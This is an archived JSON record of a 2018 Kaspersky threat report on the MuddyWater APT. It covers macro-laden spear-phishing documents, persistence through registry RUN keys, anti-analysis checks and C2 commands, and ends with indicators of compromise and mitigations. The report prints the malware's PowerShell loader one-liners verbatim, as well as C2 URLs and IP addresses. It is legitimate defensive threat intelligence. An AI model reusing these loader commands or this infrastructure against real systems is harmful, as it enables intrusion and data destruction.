{ "id": "10410d11-2c2e-4298-a474-c5c6561ad695", "created_at": "2026-04-06T00:19:07.285654Z", "updated_at": "2026-04-10T03:34:54.776559Z", "deleted_at": null, "sha1_hash": "925ce088ef1ff0bd3008fc998c554db7aaff5e4b", "title": "MuddyWater expands operations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4540276, "plain_text": "MuddyWater expands operations\r\nBy GReAT\r\nPublished: 2018-10-10 · Archived: 2026-04-05 16:25:11 UTC\r\nSummary\r\nMuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi\r\nArabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the\r\nMiddle East, Europe and the US. We recently noticed a large amount of spear phishing documents that appear to be targeting\r\ngovernment bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in\r\naddition to the continuous targeting of Iraq and Saudi Arabia, other victims were also detected in Mali, Austria, Russia, Iran\r\nand Bahrain.. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still\r\nongoing.\r\nThe new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The\r\nattackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able\r\nnot only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the\r\nattackers.\r\nPrevious related research:\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html?m=1\r\nhttps://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nhttps://www.sekoia.fr/blog/falling-on-muddywater/\r\nDecoy images by country\r\nJordan\r\nThe Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc\r\nTurkey\r\nTurkey’s General Directorate of Security Turkey’s Directorate General of Coastal Safety\r\nhttps://securelist.com/muddywater/88059/\r\nPage 1 of 12\n\nTurkey’s General Directorate of Security (Onemli Rapor.doc) Turkey’s Ministry of the Interior (Early election.doc)\r\nSaudi Arabia\r\nDocument signed by the Major General Pilot, commander of the Saudi Royal Air Force\r\nKSA King Saud University (KSU) KSA King Saud University (KSU)\r\nAzerbaijan\r\nhttps://securelist.com/muddywater/88059/\r\nPage 2 of 12\n\nİnkişaf üçün görüş.doc (meeting for development)\r\nIraq\r\nIraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers\r\nPakistan\r\nECP.doc National Assembly of Pakistan.doc\r\nhttps://securelist.com/muddywater/88059/\r\nPage 3 of 12\n\nAfghanistan\r\nPresident.doc, E-government of Afghanistan\r\nTechnical details\r\nBelow is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA\r\ncode via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim\r\nsystem information and then receives commands supported by the malware.\r\nThe initial infection vector\r\nThe initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to\r\nhinder static analysis.\r\nhttps://securelist.com/muddywater/88059/\r\nPage 4 of 12\n\nMalicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also\r\nexecuted when the user activates a fake text box.\r\nThe macro payload analysis, dropped files and registry keys\r\nThe macro payload, which is Base64 encoded, does the following:\r\n1. 1 Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the\r\n“ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another.\r\n\\EventManager.dll\r\n\\EventManager.logs\r\n\\WindowsDefenderService.inil\r\n2. 2 Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some\r\ncases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in.\r\nThe registry keys and executables may vary from one version of the malware to another.\r\nName:WindowsDefenderUpdater\r\nType:REG_EXPAND_SZ\r\nData:c:\\windows\\system32\\rundll32.exe advpack.dll,LaunchINFSection C:\\ProgramData\\EventManager.logs,Defender,1,\r\nThe next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for\r\nbypassing allowlisting solutions since they are all from Microsoft and very likely allowlisted. Regardless of the file\r\nextensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.\r\nCase 1: INF, SCT and text files dropped by the macro\r\n1. 1 INF is launched via the advpack.dll “LaunchINFSection” function.\r\n2. 2 INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library).\r\n3. 3 Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally\r\nconsumes the text file.\r\npowershell.exe -exec Bypass -c $s=(get-content C:\\\\ProgramData\\\\WindowsDefenderService.ini);$d = @();$v = 0;$c =\r\n0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -\r\ngt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join(”,$d));\r\nPowerShell one-liner\r\nEncoded text file\r\nExecution flow:\r\nhttps://securelist.com/muddywater/88059/\r\nPage 5 of 12\n\nCase 2: VBS and text files dropped by the macro\r\nThe VBS file decodes itself and calls mshta.exe, passing on one line of VBScript code to it, which in turn spawns a\r\nPowerShell one-liner which finally consumes the text file (usually Base64-encoded text).\r\npowershell.exe -w 1 -exec Bypass -nologo -noprofile -c\r\niex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content\r\nC:\\ProgramData\\ZIPSDK\\ProjectConfManagerNT.ini))));\r\nPowerShell one-liner\r\nEncoded text file\r\nExecution flow:\r\nThe PowerShell code\r\nWhen PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as\r\noutlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has\r\nmultiple layers of obfuscation.\r\nThe first thing the PowerShell code does is to disable office “Macro Warnings” and “Protected View“. This is to ensure\r\nfuture attacks don’t require user interaction. It also allows macro code to access internal VBA objects for stealthier macro\r\ncode execution in future attacks.\r\nNext, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully\r\nrebooted. The names are linked to various tools used by malware researchers.\r\nhttps://securelist.com/muddywater/88059/\r\nPage 6 of 12\n\n“win32_remote“,”win64_remote64“,”ollydbg“,”ProcessHacker“,”tcpview“,”autoruns“,”autorunsc“,”filemon“,”procmon“,”regmon“,”procexp“,”idaq“,\r\nDenylisted process names in the malware\r\nIn some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it\r\ncauses a BSOD via the ntdll.dll “NtRaiseHardError” function.\r\nCnC communication\r\nA URL is selected at random from a long list of embedded URLs held in an array named $dragon_middle. The selected\r\nURL is subsequently used for communication with the CnC server. If it can’t send data to the chosen CnC URL, it tries to\r\nobtain another random URL from $middle_dragon, then sleeps from one to 30 seconds and loops again.\r\nVictim system reconnaissance\r\nThe code then tries to obtain the victim’s public IP via “https://api.ipify.org/”.\r\nThe public IP is then POSTed along with OS Version, Internal IP, Machine Name, Domain Name, UserName after being\r\nencrypted to the previously chosen URL to register a new victim. This allows the attackers to accept or reject victims\r\ndepending on their IPs, countries, geolocations, target enterprises, etc. Depending on the response from the attacker’s CnC,\r\nthe victim is assigned an ID $sysid. This ID is sent to the CnC with each request for commands to execute.\r\nSupported commands\r\n“upload“, “screenshot“, “Excel“, “Outlook“, “risk“, “reboot“, “shutdown“, “clean“. These commands vary from one\r\nversion to another.\r\n1. 1 The “screenshot” command takes a screenshot that is saved as a.PNG file in “ProgramData“.\r\n2. 2 The “Excel” command receives another stage of the PowerShell code, saves it in “c:\\programdata\\a.ps1” and then\r\nasks Excel to execute this PowerShell script via DDE.\r\n3. 3 The “Outlook” command receives another stage of the PowerShell code, saves it in “c:\\programdata\\a.ps1” and\r\nthen asks Outlook via COM, via MSHTA.exe, to execute it.\r\n4. 4 The “risk” command receives another stage of the PowerShell code, saves it in “c:\\programdata\\a.ps1” and then\r\nasks Explorer.exe via COM interaction to execute it.\r\n5. 5 The “upload” command downloads files from the CnC and saves them locally in “C:\\ProgramData“.\r\n6. 6 The “clean” command destroys the victim’s disk drives C, D, E, F and then reboots.\r\n7. 7 The “reboot” and “shutdown” commands immediately reboot and shut down the victim’s machine.\r\nIn one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords\r\n“Kasper“, “Panda“, or “ESET“.\r\nhttps://securelist.com/muddywater/88059/\r\nPage 7 of 12\n\nVictimology\r\nMost victims of MuddyWater were found in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan. Other\r\nvictims were also recorded in Russia, Iran, Bahrain, Austria and Mali. The malicious decoy documents used in the attacks\r\nsuggest they are geopolitically motivated, targeting sensitive personnel and organizations.\r\nAttacker deception and attribution\r\nhttps://securelist.com/muddywater/88059/\r\nPage 8 of 12\n\nThe deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most\r\nlikely served as prototypes. Multiple documents used in the attacks also contain embedded paths from their authors’\r\nmachines. These paths are embedded by Office under various circumstances, for instance, when somebody adds a binary\r\nobject (an OLE control, e.g. text box or command button) into a Word document. The paths discovered are:\r\n• C:\\Users\\leo\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd\r\n• C:\\Users\\poopak\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd\r\n• C:\\Users\\Vendetta\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd\r\n• C:\\Users\\Turk\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd\r\nLeo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are\r\nbased. Turk could point to a person of Turkish origin. Poopak is a Persian girl’s name or might suggest the authors are not\r\nentirely happy with “Pak”, which could be short for Pakistan. Leo could be one of the attacker’s names. We also don’t rule\r\nout the possibility of false flags, with the attackers using random usernames to confuse researchers.\r\nIn multiple instances, we have also found Chinese text inside the samples, possibly indicating the reuse of code by the\r\nattackers.\r\n无法连接到网址,请等待龙…\r\n无法访问本地计算机寄存器\r\n任务计划程序访问被拒绝\r\nChinese text found in PowerShell code in multiple samples\r\nUnable to connect to the URL, please wait for the dragon…\r\nUnable to access local computer register\r\nTask Scheduler access denied\r\nTranslation of Chinese text\r\nWe have also noticed that for some samples, e.g. 5a42a712e3b3cfa1db32d9e3d832f8f1, the PowerShell code had only three\r\nCnC URLs, which leads us to believe that most of the CnC URLs in $dragon_middle found in other samples could actually\r\nbe ‘noise’ to distract researchers or trigger false positives.\r\nhttp://www.cankayasrc[.]com/style/js/main.php\r\nhttp://ektamservis[.]com/includes/main.php\r\nhttp://gtme[.]ae/font-awesome/css/main.php\r\nRecommendations for organizations\r\nEffective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via\r\nsolutions and training, allowing an organization to control any activities on their network or suspicious files on user systems.\r\nThe best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including\r\nthose related to improper system configurations or errors in proprietary applications. Organizations are also recommended to\r\nimplement the following steps for an enhanced level of protection at their premises.\r\n1. 1 Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object.\r\n2. 2 Lock PowerShell Execution Policy, must be set to “AllSigned” via GPO.\r\n3. 3 An allowlisting solution to prevent certain process child-parent execution hierarchies.\r\nConclusion\r\nThe MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in\r\naddition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are\r\nactively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab\r\nexpects these types of attacks to intensify in the near future.\r\nIn order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following\r\nmeasures:\r\nEducate generic staff to be able to distinguish malicious behavior like phishing links.\r\nEducate information security staff to have full configuration, investigative and hunting abilities.\r\nUse a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting\r\nattacks by analyzing network anomalies.\r\nProvide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for\r\ntargeted attack prevention and discovery, such as indicators of compromise and YARA rules.\r\nMake sure enterprise-grade patch management processes are well established and executed.\r\nhttps://securelist.com/muddywater/88059/\r\nPage 9 of 12\n\nHigh-profile organizations should have elevated levels of cybersecurity, attacks against them are inevitable and are unlikely\r\nto ever cease.\r\nAdditional information\r\nIn the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’\r\narsenal but also some OPSEC mistakes made by the attackers.\r\nFurther details about the attackers’ arsenal, additional indicators of compromise, YARA rules and attribution information is\r\navailable to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com\r\nIndicators of compromise\r\nMD5\r\n08acd1149b09bf6455c553f512b51085\r\na9ec30226c83ba6d7abb8d2011cdae14\r\nE5683fb480353c0dec333a7573710748\r\n159238b473f80272fdcd0a8ddf336a91\r\n16ac1a2c1e1c3b49e1a3a48fb71cc74f\r\n1b086ab28e3d6f73c6605f9ae087ad4a\r\n23c82e8c028af5c64cbe37314732ec19\r\n24e1bd221ba3813ed7b6056136237587\r\n2e82e242cb0684b98a8f6f2c0e8a12f3\r\n37f7e6e5f073508e1ee552ebea5d200e\r\n3bb14adb551663fd2328d59f653ba757\r\n3c2a0d6d0ecf06f1be9ad411d06f7ba8\r\n4c5a5c236c9f4480b3d725f297673fad\r\n4f873578956d2790101443f24e4bd4d3\r\n5466c8a099d1d30096775b1f4357d3cf\r\n59502e209aedf80e170e653306ca1553\r\n5a42a712e3b3cfa1db32d9e3d832f8f1\r\n5bd61a94e7698574eaf82ef277316463\r\n5de97ae178888f2dd222bb8a66060ac2\r\n665947cf7037a6772687b69279753cdf\r\n7a2ff07283ddc69d9f34cfa0d3c936d4\r\n7beb94f602e97785370fec2d059d54a5\r\n801f34abbf90ac2b4fb4b6289830cd16\r\n864d6321be50f29e7a7a4bfab746245a\r\n8a36d91ca331f62642dbcafc2ea1b1ab\r\n9486593e4fb5a4d440093d54a3519187\r\n94edf251b5fe7cc19488b5f0c3c3e359\r\n9c6648cedeb3f5d9f6d104e638bd0c3d\r\n9f4044674100a8c28f9ed1b336c337ce\r\naa1e8d0e1c4d4eb9984124df003ea7f2\r\naa564e207926d06b8a59ba50ca2c543d\r\nab4f947f4649b9ec28d182b02778aa69\r\nad92ccf85ec170f340457d33bbb81df5\r\nb8939fa58fad8aa1ec271f6dae0b7255\r\nbb476622bcb0c666e12fbe4ccda8bbef\r\nbe62fc5b1576e0a8491519e10bab931d\r\nbf310319d6ef95f69a45fc4f2d237ed4\r\nc375bbf248592cee1a1999227457c300\r\nc73fc71ee35e99230941f03fc32934d9\r\nc8b0458c384fd34971875b1c753c9c7c\r\ncd371d1d3bd7c8e2110587cfa8b7eaea\r\nce2df2907ce543438c19cfaf6c14f699\r\nd15aee026074fbd18f780fb51ec0632a\r\nd632c8444aab1b43a663401e80c0bac4\r\nd6acee43d61cbd4bcd7a5bdf4ed9b343\r\ne3e25957b738968befcf2333aa637d97\r\ne5683fb480353c0dec333a7573710748\r\neb69fb45feb97af81c2f306564acc2da\r\nf00fd318bf58586c29ab970132d1fd2a\r\nf2b5373f32a4b9b3d34701ff973ba69c\r\nhttps://securelist.com/muddywater/88059/\r\nPage 10 of 12\n\nf84914c30ae4e6b9b1f23d5c01e001ed\r\nfaa4469d5cd90623312c86d651f2d930\r\nFfb8ea0347a3af3dd2ab1b4e5a1be18a\r\n345b1ea293764df86506f97ba498cc5e\r\n029cb7e622f4eb0d058d577c9d322e92\r\n06178b5181f30ce00cd55e2690f667ac\r\n2b8ab9112e34bb910055d85ec800db3f\r\n47ec75d3290add179ac5218d193bb9a8\r\nbefc203d7fa4c91326791a73e6d6b4da\r\nC561e81e30316208925bfddb3cf3360a\r\n132efd7b3bdfb591c1bf2a4e19c710eb\r\ne7a6c57566d9523daa57fe16f52e377e\r\nc0e35c4523a7931f4c99616d6079fd14\r\n245fa82c89875b70c2669921d4ba14d3\r\nFile names\r\n%SystemDrive%\\ProgramData\\EventManager.dll\r\n%SystemDrive%\\ProgramData\\EventManager.logs\r\n%SystemDrive%\\ProgramData\\WindowsDefenderService.ini\r\n%SystemDrive%\\ProgramData\\Defender.sct\r\n%SystemDrive%\\ProgramData\\DefenderService.inf\r\n%SystemDrive%\\ProgramData\\WindowsDefender.ini\r\n%SystemDrive%\\ProgramData\\ZIPSDK\\InstallConfNT.vbs\r\n%SystemDrive%\\ProgramData\\ZIPSDK\\ProjectConfManagerNT.ini\r\n%SystemDrive%\\ProgramData\\WindowsDefenderTask.ini\r\n%SystemDrive%\\ProgramData\\WindowsDefenderTask.txt\r\n%SystemDrive%\\ProgramData\\WindowsDefenderTask.xml\r\n%SystemDrive%\\ProgramData\\DefenderNT\\ConfigRegister.vbs\r\n%SystemDrive%\\ProgramData\\DefenderNT\\SetupConf.ini\r\n%SystemDrive%\\ProgramData\\ASDKiMalwareSDK\\ProjectConfSDK.vbs\r\n%SystemDrive%\\ProgramData\\ASDKiMalwareSDK\\SetupConfSDK.ini\r\n%SystemDrive%\\ProgramData\\FirefoxSDK\\ConfigRegisterSDK.ini\r\n%SystemDrive%\\ProgramData\\FirefoxSDK\\ConfigRegisterSDK.vbs\r\n%SystemDrive%\\ProgramData\\OneDrive.dll\r\n%SystemDrive%\\ProgramData\\OneDrive.html\r\n%SystemDrive%\\ProgramData\\OneDrive.ini\r\n%SystemDrive%\\ProgramData\\WindowsNT\\WindowsNT.ini\r\n%SystemDrive%\\ProgramData\\WindowsNT\\WindowsNT.vbs\r\n%SystemDrive%\\ProgramData\\SYSTEM32SDK\\ConfManagerNT.vbs\r\n%SystemDrive%\\ProgramData\\SYSTEM32SDK\\ProjectConfManagerNT.ini\r\n%windir%\\System32\\Tasks\\Microsoft\\WindowsDefenderUpdater\r\n%windir%\\System32\\Tasks\\Microsoft\\MicrosoftOneDrive\r\n%windir%\\System32\\Tasks\\Microsoft\\WindowsDifenderUpdate\r\n%windir%\\System32\\Tasks\\Microsoft\\WindowsSystem32SDK\r\n%windir%\\System32\\Tasks\\Microsoft\\WindowsDefenderSDK\r\n%windir%\\System32\\Tasks\\Microsoft\\WindowsMalwareDefenderSDK\r\n%windir%\\System32\\Tasks\\Microsoft\\WindowsMalwareByteSDK\r\nDomains, URLs and IP addresses\r\nhttp://www.cankayasrc[.]com/style/js/main.php\r\nhttp://ektamservis[.]com/includes/main.php\r\nhttp://gtme[.]ae/font-awesome/css/main.php\r\nhttps://www.adfg[.]ae/wp-includes/widgets/main.php\r\nhttp://adibf[.]ae/wp-includes/js/main.php\r\nhttp://hubinasia[.]com/wp-includes/widgets/main.php\r\nhttps://benangin[.]com/wp-includes/widgets/main.php\r\n104.237.233.60\r\n104.237.255.212\r\n104.237.233.40\r\n5.9.0.155\r\nhttps://securelist.com/muddywater/88059/\r\nPage 11 of 12\n\nSource: https://securelist.com/muddywater/88059/\r\nhttps://securelist.com/muddywater/88059/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "MITRE", "Malpedia" ], "references": [ "https://securelist.com/muddywater/88059/" ], "report_names": [ "88059" ], "threat_actors": [ { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null }, { "id": "3a0cfbbc-2acf-4cc8-afe1-1859679c522c", "created_at": "2022-10-25T16:07:24.373716Z", "updated_at": "2026-04-10T02:00:04.963615Z", "deleted_at": null, "main_name": "Vendetta", "aliases": [ "TA2719" ], "source_name": "ETDA:Vendetta", "tools": [ "AsyncRAT", "Atros2.CKPN", "Nancrat", "NanoCore", "NanoCore RAT", "ReZer0", "Remcos", "RemcosRAT", "Remvio", "RoboSki", "Socmer", "Zurten" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434747, "ts_updated_at": 1775792094, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/925ce088ef1ff0bd3008fc998c554db7aaff5e4b.pdf", "text": "https://archive.orkl.eu/925ce088ef1ff0bd3008fc998c554db7aaff5e4b.txt", "img": "https://archive.orkl.eu/925ce088ef1ff0bd3008fc998c554db7aaff5e4b.jpg" } }